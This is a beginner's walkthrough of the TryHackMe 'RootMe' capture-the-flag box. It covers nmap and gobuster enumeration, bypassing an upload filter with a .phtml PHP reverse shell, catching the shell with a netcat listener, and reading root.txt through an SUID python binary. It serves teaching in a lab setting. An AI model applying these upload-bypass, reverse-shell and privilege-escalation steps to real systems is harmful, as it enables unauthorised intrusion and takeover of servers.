TryHackMe Walk-through on RootMe
Hello guys,back again with another walk-through on RootMe ctf in tryhackme.com,this was an easy box, a ctf for beginners, can you root me?
Let’s get started right away,make sure everything is up and running,but before that,with this challenges like CTFs the more tasks you solve, the more your self-confidence will improve. These small successes will give you energy and keep you motivated to choose increasingly complex challenges which leads us to our next point.So guys keep going no matter how bad you think your skills are,you will improve and be the best.
Ready?,as usual we normally start with enumeration part, nmap -sC -sV -oA nmap/rootme <ip address> -v, -sC performs a script scan using default set of scripts and -sV for version detection, -oA to output all nmap format and save them in nmap/rootme folder, -v increases the verbosity level,below is a screenshot:
We find that 2 ports are open, port 22 for ssh and port 80 for a web server,and for this case Apache server, well,we can now proceed to check what is on the site by just typing in the ip address on your preferred browser and this is what the page looks like:
Checking on the source code,nothing interesting there,so i started brute-forcing for hidden directories using gobuster,you can also try using nikto, dirb search,there are a lot of tools out there to help you but here we are gonna use gobuster, so gobuster dir -u http://<ip address>/ -w <wordlist> -x php,cgi,sh,txt where -u is for url, -w for wordlist ( i used wordlist that comes with linux in /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt)and -x for appending any other extensions on the directories,this is so awesome,guys you gonna like this:
So we find that most of the directories are with status code 301,navigating through them i couldn’t find anything interesting,going to /index.php, it is the home page,,nothing much,going to /uploads, it is empty and that tells us something about what we are looking for,it means to get a shell on this machine we will have to upload something like a file with a php reverse shell script and it will be stored here at uploads,wau this is so interesting,am loving this,finally we have /panel, checking on this we find a page to upload a file:
We are almost there guys,now i tried uploading an image file,uploading an html file,it accepts,this time i tried to upload a php-reverse shell script but unfortunately it failed,there is some kind of extension filtering so i wasn’t successful,but after doing alot of research i came across something with the extension .phtml, this extension is most commonly associated with PHP Web pages,so i changed my php-reverse-shell from .php extension to .phtml extension,makesure to change the ip address to your machine’s ip address before uploading it to the server ,then upload the file and it is successful,
Going to uploads directory we see that our reverse-shell script has been uploaded successful,now it is time to set up a nc listener on the attacker machine with a listening port number of your choice, nc -lvnp 1234,
Now it is time to execute the script,just click on the script at upload folder and voila!,we have a shell back at our machine with user www-data
Congratulation if you have managed to go that far,now it is time to look for the flag,user.txt, after searching all the directories manually i found it finally at /var/www folder,but to automate your task i used find command and it was faster than doing it manually, find / -name user.txt
Navigating to that folder we find ourselve a flag,submit it and lets move on to the next flag.
Next flag is found by searching for files with SUID permission to enable us escalate our privileges to read the root.txt file.Let us get started,first i uploaded linpeas.sh file ,make it executable and execute it, it is used to identify potential privilege escalation vectors on a target machine and luckily,it didn’t take long to find a file with SUID permission, /usr/bin/python, as shown below:
Having that in mind,i wrote a script to read root.txt file in the root directory taking an advantage of /usr/bin/python SUID permission, /usr/bin/python -c ‘print(open(“/root/root.txt”).read())’ and boom! we have our second flag and that concludes our journey for this walk-through today
Thank you guys,i hope this was fun,see you in the next walk-through,don’t forget to leave a comment
